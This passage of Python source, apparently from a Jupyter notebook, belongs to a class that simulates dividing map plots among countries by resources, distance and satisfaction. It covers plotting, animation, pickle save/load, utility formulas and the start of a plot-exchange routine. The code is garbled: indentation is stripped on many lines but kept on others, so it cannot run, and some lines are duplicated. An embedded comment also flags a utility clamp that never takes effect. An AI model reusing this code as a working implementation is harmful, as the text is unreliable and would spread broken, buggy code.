            slider = widgets.IntSlider(iteration, min = 0, max = len(change_map))  # the slider itself
            label = widgets.Label(value = 'Iteration ' + str(iteration) + ((start!=0)*('(' + str(start + iteration) + ')')) + ' of ' + str(len(change_map)) + (' ' + change_map[slider.value - 1][3]) * (slider.value != 0))
display(slider, label)
def update_plot(angle1 = 30, angle2 = 30):
self.angle1 = angle1
self.angle2 = angle2
ax.view_init(angle1, angle2)
fig.canvas.draw_idle()
def update_angle1(value):
update_plot(angle1 = value['new'], angle2 = self.angle2)
def update_angle2(value):
update_plot(angle1 = self.angle1, angle2 = value['new'])
angle1_slider.observe(update_angle1, names = 'value')
angle2_slider.observe(update_angle2, names = 'value')
slider.observe(update_iteration, names = 'value')
angle1_slider.observe(update_angle1, names = 'value')
angle2_slider.observe(update_angle2, names = 'value')
slider.observe(update_iteration, names = 'value')
    # CURRENT MAP (extended palette?)
    def terr(self, diff = True):
        if self.inline == 0:  # matplotlib setup
            %matplotlib inline
            self.inline = 1
        if (diff):  # draw the map
plt.imshow(list(map(lambda a, b, c: list(map(lambda x, y, z: 2*x*(x>0) + x - 2 * y + z, a, b, c)),
np.array(self.unos)[:, :, 2].astype(int), np.array(self.unos)[:, :, 1].astype(int),
np.array(self.unos)[:, :, 5].astype(int))), cmap = cm.viridis)
else:
plt.imshow(np.array(self.unos)[:, :, 2].astype(int), cmap = cm.viridis)
if self.percent == False:
plt.title(str(len(self.change_map)) + ' ' + str(np.array(self.countries)[:, 1].astype(int)))
else:
plt.title(str(len(self.change_map)) + ' ' + str([round(x, 3) for x in np.array(self.countries)[:, 1]]))
plt.show()
    # ANIMATION OF MAP CHANGES; all arguments are optional
    # (extended palette?, frame duration in milliseconds, changes per frame, loop the animation?)
    def anim_terr(self, diff = True, interval = 200, x = 100, repeat = False):
        if self.inline >= 1:  # matplotlib setup
            for i in range(self.inline):
                %matplotlib notebook
            %matplotlib notebook
            self.inline = 0
        if diff:  # the animation
f = plt.figure()
ax = f.gca()
im = copy.deepcopy(self.start_map_diff)
image = plt.imshow(im, interpolation='None', animated=True, cmap = cm.viridis)
def function_for_animation(frame_index):
for i in range(x):
im[self.change_map[min(frame_index * x + i, len(self.change_map) -
1)][0]][self.change_map[min(frame_index * x + i, len(self.change_map) -
1)][1]] = (self.change_map[min(frame_index * x + i, len(self.change_map) - 1)][2] * 3 - (self.change_map[min(frame_index * x + i, len(self.change_map) - 1)][3] == 'EEZ '))
image.set_data(im)
ax.set_title(self.change_map[min(frame_index * x, len(self.change_map) - 1)][3]
+ str(min(frame_index * x, len(self.change_map) - 1)) + ' '
+ str(self.change_sati[min(frame_index * x, len(self.change_map) - 1)]))
return matplotlib.animation.FuncAnimation(f, function_for_animation, interval=interval,
frames=(((len(self.change_map) - 1) // x) + 2), repeat = repeat, blit=True)
else:
f = plt.figure()
ax = f.gca()
im = copy.deepcopy(self.start_map)
image = plt.imshow(im, interpolation='None', animated=True, cmap = cm.viridis)
def function_for_animation(frame_index):
for i in range(x):
im[self.change_map[min(frame_index * x + i, len(self.change_map) -
1)][0]][self.change_map[min(frame_index * x + i, len(self.change_map) -
1)][1]] = self.change_map[min(frame_index * x + i, len(self.change_map) - 1)][2]
image.set_data(im)
ax.set_title(self.change_map[min(frame_index * x, len(self.change_map) - 1)][3]
+ str(min(frame_index * x, len(self.change_map) - 1)) + ' '
+ str(self.change_sati[min(frame_index * x, len(self.change_map) - 1)]))
return matplotlib.animation.FuncAnimation(f, function_for_animation, interval=interval,
frames=(((len(self.change_map) - 1) // x) + 2), repeat = repeat, blit = True)
    # HISTOGRAM OF THE COUNTRIES' CURRENT SATISFACTION
    def hist(self):
        if self.inline == 0:  # matplotlib setup
            %matplotlib inline
            self.inline = 1
        fig = plt.figure(dpi = 80, figsize = (8, 4))  # the histogram
plt.title(str(len(self.change_sati)))
mpl.rcParams.update({'font.size': 10})
ax = plt.axes()
plt.xlim( -0.5, len(self.names) - 0.5)
for i in range(len(self.names)):
if self.percent == False:
ax.text(i + 0.15, np.array(self.countries)[:, 1].astype(int)[i], np.array(self.countries)[:, 1].astype(int)[i])
else:
ax.text(i + 0.15, round(np.array(self.countries)[i][1], 3), round(np.array(self.countries)[i][1], 3))
ax.yaxis.grid(True, zorder = 1)
if self.percent == False:
plt.bar([x for x in range(len(self.names))], np.array(self.countries)[:, 1].astype(int), width = 0.3, color = 'blue',
alpha = 0.7, zorder = 2)
else:
plt.bar([x for x in range(len(self.names))], [round(x, 3) for x in np.array(self.countries)[:, 1]], width = 0.3, color = 'blue',
alpha = 0.7, zorder = 2)
plt.xticks(range(len(self.names)), self.names)
plt.legend(loc='upper right')
    # ANIMATED SATISFACTION HISTOGRAM; all arguments are optional
    # (frame duration in milliseconds, changes per frame, loop the animation?)
    def anim_hist(self, interval = 200, x = 1, repeat = False):
        if self.inline >= 1:  # matplotlib setup
            for i in range(self.inline):
                %matplotlib notebook
            %matplotlib notebook
            self.inline = 0
        fig = plt.figure(dpi = 80, figsize = (8, 4))  # the animated histogram
ranges = (np.array(self.change_sati).max() - np.array(self.change_sati).min()) * 0.1
def function_for_animation(frame_index):
plt.clf()
plt.title(self.change_map[min(frame_index * x, len(self.change_map) - 1)][3] + str(min(frame_index * x, len(self.change_map) - 1)))
plt.ylim([np.array(self.change_sati).min() - ranges, np.array(self.change_sati).max() + ranges])
plt.xlim( -0.5, len(self.names) - 0.5)
mpl.rcParams.update({'font.size': 10})
ax = plt.axes()
for i in range(len(self.names)):
ax.text(i + 0.15, self.change_sati[min(frame_index * x, len(self.change_map) - 1)][i],
self.change_sati[min(frame_index * x, len(self.change_map) - 1)][i])
ax.yaxis.grid(True, zorder = 1)
plt.bar([x for x in range(len(self.names))], self.change_sati[min(frame_index * x, len(self.change_map) - 1)],
width = 0.3, color = 'blue', alpha = 0.7, zorder = 2)
plt.xticks(range(len(self.names)), self.names)
plt.legend(loc='upper right')
return matplotlib.animation.FuncAnimation(fig, function_for_animation, interval=interval, repeat = repeat,
init_func = None, frames=(((len(self.change_sati) - 1) // x) + 2), blit=True)
    # CURRENT MAP AND SATISFACTION HISTOGRAM (extended palette?)
    def terr_hist(self, diff = True):
        if self.inline == 0:  # matplotlib setup
            %matplotlib inline
            self.inline = 1
        nrows = 1  # figure layout
        ncols = 2
        fig = plt.figure(figsize=(10, 5))
        ax = fig.add_subplot(nrows, ncols, 1)
        if diff:  # the map
            plt.imshow(list(map(lambda a, b, c: list(map(lambda x, y, z: 2*x*(x>0) + x - 2 * y + z, a, b, c)),
                       np.array(self.unos)[:, :, 2].astype(int), np.array(self.unos)[:, :, 1].astype(int),
                       np.array(self.unos)[:, :, 5].astype(int))), cmap = cm.viridis)
        else:
            plt.imshow(np.array(self.unos)[:, :, 2].astype(int))
        # the histogram
if self.percent == False:
plt.title(str(len(self.change_map)) + ' ' + str(np.array(self.countries)[:, 1].astype(int)))
else:
plt.title(str(len(self.change_map)) + ' ' + str([round(x, 3) for x in np.array(self.countries)[:, 1]]))
plt.show()
ax = fig.add_subplot(nrows, ncols, 2)
plt.title(str(len(self.change_sati)))
mpl.rcParams.update({'font.size': 10})
plt.xlim( -0.5, len(self.names))
for i in range(len(self.names)):
if self.percent == False:
ax.text(i + 0.15, np.array(self.countries)[:, 1].astype(int)[i], np.array(self.countries)[:, 1].astype(int)[i])
else:
ax.text(i + 0.15, round(np.array(self.countries)[i][1], 3), round(np.array(self.countries)[i][1], 3))
ax.yaxis.grid(True, zorder = 1)
if self.percent == False:
plt.bar([x for x in range(len(self.names))], np.array(self.countries)[:, 1].astype(int), width = 0.3, color = 'blue',
alpha = 0.7, zorder = 2)
else:
plt.bar([x for x in range(len(self.names))], [round(x, 3) for x in np.array(self.countries)[:, 1]], width = 0.3, color = 'blue',
alpha = 0.7, zorder = 2)
plt.xticks(range(len(self.names)), self.names)
plt.legend(loc='upper right')
    # ANIMATED MAP AND HISTOGRAM; all arguments are optional
    # (extended palette?, frame duration in milliseconds, changes per frame, loop the animation?)
    def anim(self, diff = True, interval = 200, x = 1, repeat = False):
        if self.inline >= 1:  # matplotlib setup
            for i in range(self.inline):
                %matplotlib notebook
            %matplotlib notebook
            self.inline = 0
        nrows = 1  # figure layout
        ncols = 2
        fig = plt.figure(figsize=(10, 5))
        ranges = (np.array(self.change_sati).max() - np.array(self.change_sati).min()) * 0.1
        if diff:  # animate the map and the histogram
im = copy.deepcopy(self.start_map_diff)
def function_for_animation(frame_index):
plt.clf()
ax = fig.add_subplot(nrows, ncols, 2)
plt.title(self.change_map[min(frame_index * x, len(self.change_map) - 1)][3] + str(min(frame_index * x, len(self.change_map) - 1)))
plt.ylim([np.array(self.change_sati).min() - ranges, np.array(self.change_sati).max() + ranges])
plt.xlim( -0.5, len(self.names))
mpl.rcParams.update({'font.size': 10})
for i in range(len(self.names)):
ax.text(i + 0.15, self.change_sati[min(frame_index * x, len(self.change_map) - 1)][i],
self.change_sati[min(frame_index * x, len(self.change_map) - 1)][i])
ax.yaxis.grid(True, zorder = 1)
plt.bar([x for x in range(len(self.names))], self.change_sati[min(frame_index * x, len(self.change_map) - 1)],
width = 0.3, color = 'blue', alpha = 0.7, zorder = 2)
plt.xticks(range(len(self.names)), self.names, rotation=30)
plt.legend(loc='upper right')
ax = fig.add_subplot(nrows, ncols, 1)
for i in range(x):
im[self.change_map[min(frame_index * x + i, len(self.change_map) -
1)][0]][self.change_map[min(frame_index * x + i, len(self.change_map) -
1)][1]] = (self.change_map[min(frame_index * x + i, len(self.change_map) - 1)][2] * 3 - (self.change_map[min(frame_index * x + i, len(self.change_map) - 1)][3] == 'EEZ '))
image = plt.imshow(im, interpolation='None', animated=True, cmap = cm.viridis)
ax.set_title(self.change_map[min(frame_index * x + i, len(self.change_map) - 1)][3] + str(min(frame_index * x,
len(self.change_map) - 1)) + ' ' +
str(self.change_sati[min(frame_index * x, len(self.change_map) - 1)]))
else:
im = copy.deepcopy(self.start_map)
def function_for_animation(frame_index):
plt.clf()
ax = fig.add_subplot(nrows, ncols, 2)
plt.title(self.change_map[min(frame_index * x, len(self.change_map) - 1)][3] + str(min(frame_index * x, len(self.change_map) - 1)))
plt.ylim([np.array(self.change_sati).min() - ranges, np.array(self.change_sati).max() + ranges])
plt.xlim( -0.5, len(self.names))
mpl.rcParams.update({'font.size': 10})
for i in range(len(self.names)):
ax.text(i + 0.15, self.change_sati[min(frame_index * x, len(self.change_map) - 1)][i],
self.change_sati[min(frame_index * x, len(self.change_map) - 1)][i])
ax.yaxis.grid(True, zorder = 1)
plt.bar([x for x in range(len(self.names))], self.change_sati[min(frame_index * x, len(self.change_map) - 1)],
width = 0.3, color = 'blue', alpha = 0.7, zorder = 2)
plt.xticks(range(len(self.names)), self.names, rotation=30)
plt.legend(loc='upper right')
ax = fig.add_subplot(nrows, ncols, 1)
for i in range(x):
im[self.change_map[min(frame_index * x + i, len(self.change_map) -
1)][0]][self.change_map[min(frame_index * x + i, len(self.change_map) -
1)][1]]= self.change_map[min(frame_index * x + i, len(self.change_map) - 1)][2]
image = plt.imshow(im, interpolation='None', animated=True, cmap = cm.viridis)
ax.set_title(self.change_map[min(frame_index * x + i, len(self.change_map) - 1)][3] + str(min(frame_index * x,
len(self.change_map) - 1)) + ' ' +
str(self.change_sati[min(frame_index * x, len(self.change_map) - 1)]))
return matplotlib.animation.FuncAnimation(fig, function_for_animation, interval=interval, repeat = repeat,
init_func = None, frames=(((len(self.change_sati) - 1) // x) + 2), blit=True)
    # MAP OF ONE RESOURCE (resource index)
    def map_resource(self, n):
        if self.inline == 0:  # matplotlib setup
            %matplotlib inline
            self.inline = 1
plt.imshow(np.array(self.res_map[n]), cmap = cm.viridis)
plt.show()
    # COMBINED MAP OF ALL RESOURCES
    def map_all_resources(self):
        if self.inline == 0:  # matplotlib setup
            %matplotlib inline
            self.inline = 1
arr = self.res_map[0].copy()
for i in range(len(self.res_map) - 1):
arr += self.res_map[i + 1]
plt.imshow(np.array(arr))
plt.show()
    # ALL RESOURCE MAPS
    def map_resources(self):
        if self.inline == 0:  # matplotlib setup
            %matplotlib inline
            self.inline = 1
f, axarr = plt.subplots(len(self.res_map), 1)
for i in range(len(self.res_map)):
axarr[i].imshow(self.res_map[i])
plt.show()
    # DISTANCE MAP FOR A COUNTRY (country index)
    def map_dist(self, n):
        if self.inline == 0:  # matplotlib setup
            %matplotlib inline
            self.inline = 1
plt.imshow(np.array(self.dist_map[n]))
plt.show()
    # UTILITY MAP FOR A COUNTRY (country index)
    def map_sati(self, n):
        if self.inline == 0:  # matplotlib setup
            %matplotlib inline
            self.inline = 1
plt.imshow(np.array(self.sati_map[n]))
plt.show()
    # DISTANCE AND UTILITY MAPS FOR A COUNTRY (country index)
    def map_country(self, n):
        if self.inline == 0:  # matplotlib setup
            %matplotlib inline
            self.inline = 1
f, axarr = plt.subplots(1,2)
axarr[0].imshow(self.dist_map[n])
axarr[1].imshow(self.sati_map[n])
plt.show()
    # ALL COUNTRIES' DISTANCE MAPS
    def map_dists(self):
        if self.inline == 0:  # matplotlib setup
            %matplotlib inline
            self.inline = 1
f, axarr = plt.subplots(len(self.countries), 1)
for i in range(len(self.countries)):
axarr[i].imshow(self.dist_map[i])
plt.show()
    # ALL COUNTRIES' UTILITY MAPS
    def map_satis(self):
        if self.inline == 0:  # matplotlib setup
            %matplotlib inline
            self.inline = 1
f, axarr = plt.subplots(len(self.countries), 1)
for i in range(len(self.countries)):
axarr[i].imshow(self.sati_map[i])
plt.show()
    # ALL COUNTRIES' DISTANCE AND UTILITY MAPS
    def map_dists_satis(self):
        if self.inline == 0:  # matplotlib setup
            %matplotlib inline
            self.inline = 1
f, axarr = plt.subplots(len(self.countries), 2)
for i in range(len(self.countries)):
axarr[i, 0].imshow(self.dist_map[i])
axarr[i, 1].imshow(self.sati_map[i])
plt.show()
    ## SAVING AND LOADING ##
    # SAVE THE TERRITORY (pass the save-file name)
    def save(self, name):
        if(self.isave == 1):  # check the save indicator
            print('')  # print an empty line
            self.isave = 0
        sys.stdout.write("Saving...\r".format())
        sys.stdout.flush()
        pd.DataFrame([pd.DataFrame(self.unos), pd.DataFrame(self.countries),  # persist every variable
                      pd.DataFrame([self.names]), pd.DataFrame([self.ind]), pd.DataFrame(self.d),
                      pd.DataFrame(self.change_map), pd.DataFrame(self.change_sati), pd.DataFrame(self.start_map),
                      pd.DataFrame(self.start_map_diff), pd.DataFrame(self.transferable), pd.DataFrame(self.z),
                      pd.DataFrame([self.exchanged]), pd.DataFrame([self.full]),
                      pd.DataFrame([self.name, self.i_char, self.i_exch, self.isave, self.sphere,
                                    self.radius, self.inline, self.angle1, self.angle2, self.percent, self.i_exch2])
                      ]).to_pickle(name)
        print('Saved! ')
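    # NOTE: load() below unpacks this pickle purely by position (df[0][0] through
    # df[0][13]), so the order of the DataFrames above must stay in sync with it.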
    # LOAD A TERRITORY (pass the file name)
    def load(self, name):
        if(self.isave == 1):  # check the save indicator
            print('')  # print an empty line
            self.isave = 0
        # load every variable
sys.stdout.write("Loading. \r".format())
sys.stdout.flush()
df = pd.read_pickle(name)
sys.stdout.write("Loading.. \r".format())
sys.stdout.flush()
self.unos = df[0][0].values.tolist()
sys.stdout.write("Loading...\r".format())
sys.stdout.flush()
self.countries = df[0][1].values.tolist()
sys.stdout.write("Loading. \r".format())
sys.stdout.flush()
self.names = df[0][2].values[0].tolist()
sys.stdout.write("Loading.. \r".format())
sys.stdout.flush()
self.ind = df[0][3].values[0].tolist()
sys.stdout.write("Loading... \r".format())
sys.stdout.flush()
self.d = df[0][4].values.tolist()
sys.stdout.write("Loading. \r".format())
sys.stdout.flush()
self.change_map = df[0][5].values.tolist()
sys.stdout.write("Loading.. \r".format())
sys.stdout.flush()
        self.change_sati = df[0][6].values.tolist()
sys.stdout.write("Loading... \r".format())
sys.stdout.flush()
        self.start_map = df[0][7].values.tolist()
        sys.stdout.write("Loading.  \r".format())
        sys.stdout.flush()
        self.start_map_diff = df[0][8].values.tolist()
        sys.stdout.write("Loading.. \r".format())
        sys.stdout.flush()
        self.transferable = df[0][9].values.tolist()
        sys.stdout.write("Loading...\r".format())
        sys.stdout.flush()
        self.z = df[0][10].values.tolist()
        sys.stdout.write("Loading.  \r".format())
        sys.stdout.flush()
        # save() pickles self.exchanged at index 11 and self.full at index 12,
        # with the scalar block at index 13, so restore them from those slots
        self.exchanged = df[0][11].values[0].tolist()
        self.full = df[0][12].values[0][0]
        sys.stdout.write("Loading.. \r".format())
        sys.stdout.flush()
        self.name = df[0][13].values[0][0]
        sys.stdout.write("Loading...\r".format())
        sys.stdout.flush()
        self.i_char = df[0][13].values[1][0]
        sys.stdout.write("Loading.  \r".format())
        sys.stdout.flush()
        self.i_exch = df[0][13].values[2][0]
        sys.stdout.write("Loading.. \r".format())
        sys.stdout.flush()
        self.isave = df[0][13].values[3][0]
        sys.stdout.write("Loading...\r".format())
        sys.stdout.flush()
        self.sphere = df[0][13].values[4][0]
        sys.stdout.write("Loading.  \r".format())
        sys.stdout.flush()
        self.radius = df[0][13].values[5][0]
        sys.stdout.write("Loading.. \r".format())
        sys.stdout.flush()
        self.inline = df[0][13].values[6][0]
        sys.stdout.write("Loading...\r".format())
        sys.stdout.flush()
        self.angle1 = df[0][13].values[7][0]
        sys.stdout.write("Loading.  \r".format())
        sys.stdout.flush()
        self.angle2 = df[0][13].values[8][0]
        sys.stdout.write("Loading.. \r".format())
        sys.stdout.flush()
        self.percent = df[0][13].values[9][0]
        sys.stdout.write("Loading...\r".format())
        sys.stdout.flush()
        self.i_exch2 = df[0][13].values[10][0]
sys.stdout.write("Loading.. \r".format())
sys.stdout.flush()
        # rebuild the resource, distance and utility maps
        self.res_map = np.zeros((len(self.unos[0][0][0]), len(self.unos), len(self.unos[0])))
        self.dist_map = []
        self.sati_map = []
        for i in range(len(self.countries)):
            self.dist_map.append(np.ones((len(self.unos), len(self.unos[0]))) * -1)
            self.sati_map.append(np.ones((len(self.unos), len(self.unos[0]))) * -1)
for i in range(len(self.unos)):
for j in range(len(self.unos[0])):
for k in range(len(self.unos[0][0][0])):
if self.unos[i][j][2] != -1:
self.res_map[k][i][j] += self.unos[i][j][0][k] + 1
for k in range(len(self.countries)):
if self.unos[i][j][2] != -1:
if (self.unos[i][j][1] == False) or (self.unos[i][j][5] == True) or (self.unos[i][j][2] == k + 1):
self.dist_map[k][i][j] = self.unos[i][j][3][k]
else:
self.dist_map[k][i][j] = -2
else:
self.dist_map[k][i][j] = -1
                    if self.unos[i][j][2] != -1:
                        if (self.unos[i][j][1] == False) or (self.unos[i][j][5] == True) or (self.unos[i][j][2] == k + 1):
                            self.sati_map[k][i][j] = self.unos[i][j][4][k]
                        else:
                            self.sati_map[k][i][j] = -2
                    else:
                        self.sati_map[k][i][j] = -1
sys.stdout.write("Loading... \r".format())
sys.stdout.flush()
self.make_exch()
print('Loaded! ')
    ### INTERNAL FUNCTIONS ### (not meant to be called directly, though careful use is possible)
    ## STANDARD CALCULATIONS AND ASSIGNMENTS ##
    # DISTANCE FOR A COUNTRY (plot row, plot column, country index); returns the minimal distance
    def dist(self, f, l, i_coun):
        if self.sphere:  # spherical model: shortest chord converted into an arc length
            d = np.linalg.norm(np.array(self.started[i_coun] - np.array([f, l, self.z[f][l]])), axis = 1).min()
            return math.acos(1 - 0.5*pow(d / self.radius, 2))*self.radius
        else:  # flat model: Euclidean distance to the nearest of the country's plots
            return np.linalg.norm(np.array(self.countries[i_coun][2][:, :2]) - np.array([f, l]), axis = 1).min()
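    # A quick check of the chord-to-arc conversion above (a sketch, using the law of
    # cosines): a chord of length d on a sphere of radius R subtends the central
    # angle theta with d**2 = 2*R**2*(1 - cos(theta)), i.e. theta = acos(1 - 0.5*(d/R)**2),
    # so the great-circle distance is theta*R. For R = 1 and d = sqrt(2) this gives
    # acos(0)*1 = pi/2, a quarter of a great circle, as expected.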
    # UTILITY OF A PLOT FOR A COUNTRY (plot row, plot column, country index); returns the
    # plot's utility computed from the precomputed minimal distance
    def sati(self, f, l, i_cun):
        dista = self.unos[f][l][3][i_cun]  # precomputed minimal distance to the country
        # returns the plot's utility for the country, discounted by distance
        return max(0, ((np.array(self.unos[f][l][0]) * np.array(self.countries[i_cun][0])).sum() *
                       ((self.d[i_cun][1] - dista + 1))
                       / (self.d[i_cun][1] - min(dista, self.d[i_cun][0]) + 1)) ** 2)
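    # Worked example of the utility formula above (a sketch with made-up numbers):
    # with resource vector [1, 0], preference vector [3, 2], dista = 4 and distance
    # thresholds self.d[i_cun] = [2, 10], the base score is 1*3 + 0*2 = 3, the
    # distance factor is (10 - 4 + 1) / (10 - min(4, 2) + 1) = 7/9, and the utility
    # is (3 * 7/9) ** 2 ≈ 5.44. Note that the square is taken before max(0, ...),
    # so the clamp never fires; if negative factors (dista > d[1] + 1) are meant to
    # yield zero utility, the clamp would have to be applied inside the square.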
    # COUNTRY NEAREST TO A PLOT (plot row, plot column); returns the zero-based index of the nearest country
    def near(self, f, l):
        a = [[self.unos[f][l][3][i], -self.unos[f][l][4][i], self.countries[i][1]] for i in range(len(self.countries))]
        return a.index(min(a))
    # COUNTRY FOR WHICH THE PLOT BRINGS THE MOST UTILITY (plot row, plot column); returns the country index
    def most_sati(self, f, l):
        a = [[self.unos[f][l][4][i], -self.unos[f][l][3][i], -self.countries[i][1]] for i in range(len(self.countries))]
        return a.index(max(a))
    # ASSIGN A PLOT TO A COUNTRY (plot row, plot column, country index)
    def belong(self, f, l, i_cun, func = ''):
        if self.unos[f][l][2] > 0:  # if the plot already belongs to someone
            name_i = self.unos[f][l][2]  # index of the plot's previous owner
            self.countries[name_i - 1][1] -= (2 - self.percent) * self.unos[f][l][4][name_i - 1]  # subtract the plot's (doubled) utility from the old owner
            self.countries[name_i - 1][3].remove([f, l])  # remove the plot from the old owner's plot list
        self.unos[f][l][2] = i_cun + 1  # update the plot's owner
        if func != 'EEZ ':  # unless the transfer comes from the EEZ routine
            self.countries[i_cun][1] += (2 - self.percent) * self.unos[f][l][4][i_cun]  # add the plot's (doubled) utility to the new owner
            self.countries[i_cun][3].append([f, l])  # add the plot to the new owner's plot list
        if func[:8] != 'Exchange':
            self.change_map.append([f, l, i_cun + 1, func])  # record the change in the map-change log
        else:
            self.change_map.append([f, l, i_cun + 1, func + '(' + str(self.i_exch2) + ')'])  # record the change in the map-change log
        if self.percent == False:
            self.change_sati.append(np.array(self.countries)[:, 1].astype(int).tolist())  # record the change in the utility log
        else:
            self.change_sati.append([round(x, 3) for x in np.array(self.countries)[:, 1]])  # record the change in the utility log
        if func == 'Charity ':  # if the transfer comes from charity
            self.i_char += 1  # bump the i_char counter and report progress
            sys.stdout.write("Charity: {0}, exchange: {1} ({4}), From {2} to {3}                 \r".format(str(self.i_char),
                                                                                                            str(self.i_exch),
                                                                                                            self.names[name_i - 1],
                                                                                                            self.names[i_cun], self.i_exch2))
            sys.stdout.flush()
            self.isave = 1  # mark unsaved changes
        elif func[:8] == 'Exchange':  # if the transfer comes from an exchange
            self.i_exch += 1  # bump the i_exch counter and report progress
            sys.stdout.write("charity: {0}, Exchange: {1} ({4}), {5} From {2} to {3}             \r".format(str(self.i_char),
                                                                                                            str(self.i_exch),
                                                                                                            self.names[name_i - 1],
                                                                                                            self.names[i_cun],
                                                                                                            self.i_exch2,
                                                                                                            func[9:]))
            sys.stdout.flush()
            self.isave = 1  # mark unsaved changes
            if (self.exchanged[0].get(int(func[8:])) == None):
                self.exchanged[0][int(func[8:])] = 1
            else:
                self.exchanged[0][int(func[8:])] += 1
    ## HELPER FUNCTIONS FOR CHARITY, WORKING WITH SELF.IND ##
    # LEAST SATISFIED COUNTRY AMONG THE AVAILABLE ONES = those whose index in self.ind is mapped to 0
    def min_sat(self):
        mini = self.countries[self.ind.index(0)][1]  # satisfaction of the first available country
        answer = self.ind.index(0)  # index of the first available country
        for i in range(1, len(self.countries)):
            if self.ind[i] == 0 and self.countries[i][1] < mini:  # if a satisfaction is even lower
                mini = self.countries[i][1]  # it becomes the answer
                answer = i
        return [mini, answer]  # returns the satisfaction level and the country index
    # MOST SATISFIED COUNTRY AMONG THE AVAILABLE ONES
    def max_sat(self):
        maxi = self.countries[self.ind.index(0)][1]  # satisfaction of the first available country
        answer = self.ind.index(0)  # index of the first available country
        for i in range(1, len(self.countries)):
            if self.ind[i] == 0 and self.countries[i][1] > maxi:  # if a satisfaction is even higher
                maxi = self.countries[i][1]  # it becomes the answer
                answer = i
        return [maxi, answer]  # returns the satisfaction level and the country index
    # MOST SATISFIED COUNTRY AMONG THE UNAVAILABLE ONES
    def max_sat_re(self):
        maxi = self.countries[self.ind.index(1)][1]  # satisfaction of the first unavailable country
        answer = self.ind.index(1)  # index of the first unavailable country
        for i in range(1, len(self.countries)):
            if self.ind[i] == 1 and self.countries[i][1] > maxi:  # if a satisfaction is even higher
                maxi = self.countries[i][1]  # it becomes the answer
                answer = i
        return [maxi, answer]  # returns the satisfaction level and the country index
    ## HELPERS FOR EXCHANGE AND FAIRNESS
    # BUILDS THE LIST OF PLOTS AVAILABLE FOR MUTUAL EXCHANGE
    def make_exch(self):
        # initialise empty structures
        self.list_exchange = [[[] for i in range(len(self.countries))] for i in range(len(self.countries))]
        self.map_exchange = [[[[] for i in range(len(self.unos[0]))] for i in range(len(self.unos))] for i in range(len(self.countries) + 1)]
        for i in range(len(self.unos)):  # walk over the free plots, recording them in the exchange list and the exchange map
for j in range(len(self.unos[0])):
if ((not self.unos[i][j][1]) and self.unos[i][j][2] not in [-1, 0]):
if (i != 0 and (self.unos[i - 1][j][2] not in [-1, 0])):
if (self.unos[i][j][2] != self.unos[i - 1][j][2]):
self.list_exchange[self.unos[i][j][2] - 1][self.unos[i - 1][j][2] - 1].append([i, j])
self.map_exchange[self.unos[i - 1][j][2] - 1][i][j].append([-1, 0])
if (j != 0 and (self.unos[i][j - 1][2] not in [-1, 0])):
if (self.unos[i][j][2] != self.unos[i][j - 1][2] and len(self.map_exchange[self.unos[i][j - 1][2] - 1][i][j]) == 0):
self.list_exchange[self.unos[i][j][2] - 1][self.unos[i][j - 1][2] - 1].append([i, j])
self.map_exchange[self.unos[i][j - 1][2] - 1][i][j].append([0, -1])
if ((j != len(self.unos[0]) - 1) and (self.unos[i][j + 1][2] not in [-1, 0])):
if (self.unos[i][j][2] != self.unos[i][j + 1][2] and len(self.map_exchange[self.unos[i][j + 1][2] - 1][i][j]) == 0):
self.list_exchange[self.unos[i][j][2] - 1][self.unos[i][j + 1][2] - 1].append([i, j])
self.map_exchange[self.unos[i][j + 1][2] - 1][i][j].append([0, 1])
if ((i != len(self.unos) - 1) and (self.unos[i + 1][j][2] not in [-1, 0])):
if (self.unos[i][j][2] != self.unos[i + 1][j][2] and len(self.map_exchange[self.unos[i + 1][j][2] - 1][i][j] )== 0):
self.list_exchange[self.unos[i][j][2] - 1][self.unos[i + 1][j][2] - 1].append([i, j])
self.map_exchange[self.unos[i + 1][j][2] - 1][i][j].append([1, 0])
for i in range(len(self.unos)):
            for j in range(len(self.unos[0])):  # build the exchange-map entries for non-free plots
if ((self.unos[i][j][1]) or (self.unos[i][j][2] in [-1, 0])):
if (i != 0 and (self.unos[i - 1][j][2] not in [-1, 0]) and (not self.unos[i - 1][j][1])):
self.map_exchange[self.unos[i - 1][j][2] - 1][i][j].append([-1, 0])
if (j != 0 and (self.unos[i][j - 1][2] not in [-1, 0]) and (not self.unos[i][j - 1][1])):
self.map_exchange[self.unos[i][j - 1][2] - 1][i][j].append([0, -1])
if ((j != len(self.unos[0]) - 1) and (self.unos[i][j + 1][2] not in [-1, 0]) and (not self.unos[i][j + 1][1])):
self.map_exchange[self.unos[i][j + 1][2] - 1][i][j].append([0, 1])
if ((i != len(self.unos) - 1) and (self.unos[i + 1][j][2] not in [-1, 0]) and (not self.unos[i + 1][j][1])):
self.map_exchange[self.unos[i + 1][j][2] - 1][i][j].append([1, 0])
for i in range(len(self.unos)):
            for j in range(len(self.unos[0])):  # build the list of dangerous plots (a country's last link to a neighbour)
if ((not self.unos[i][j][1]) and self.unos[i][j][2] not in [-1, 0]):
if (len(self.map_exchange[self.unos[i][j][2] - 1][i][j]) == 1):
if (i != 0 and (self.unos[i - 1][j][2] == self.unos[i][j][2])):
self.map_exchange[-1][i - 1][j].append([1, 0])
elif ((i != len(self.unos) - 1) and (self.unos[i + 1][j][2] == self.unos[i][j][2])):
self.map_exchange[-1][i + 1][j].append([-1, 0])
                        elif ((j != len(self.unos[0]) - 1) and (self.unos[i][j + 1][2] == self.unos[i][j][2])):
self.map_exchange[-1][i][j + 1].append([0, -1])
elif (j != 0 and (self.unos[i][j - 1][2] == self.unos[i][j][2])):
self.map_exchange[-1][i][j - 1].append([0, 1])
    # MUTUALLY BENEFICIAL EXCHANGE OF RANDOM PLOTS BETWEEN TWO COUNTRIES
    def exch(self, one, two, sides1 = 8, sides2 = 8, ntry = 0):
        sys.stdout.write("charity: {0}, Exchange: {1} ({5}), {6} Try {4} from {2} to {3}            \r".format(str(self.i_char),
                                                                                                               str(self.i_exch),
                                                                                                               self.names[one],
                                                                                                               self.names[two], ntry,
                                                                                                               self.i_exch2,
                                                                                                               str(min(sides1, sides2))))
        first = []  # plots the first country puts up for exchange
        second = []  # plots the second country puts up for exchange
        firstsati = []  # satisfaction changes caused by handing over the first country's plots
        secondsati = []  # satisfaction changes caused by handing over the second country's plots
        constteamone = []  # constraints keeping a first-country plot from being stranded when all its own neighbours leave
        constteamtwo = []  # constraints keeping a second-country plot from being stranded when all its own neighbours leave
        constenemyone = []  # constraints keeping a first-country plot from staying when all its foreign neighbours become friendly
        constenemytwo = []  # constraints keeping a second-country plot from staying when all its foreign neighbours become friendly
        # indices of randomly sampled candidate plots of the first country
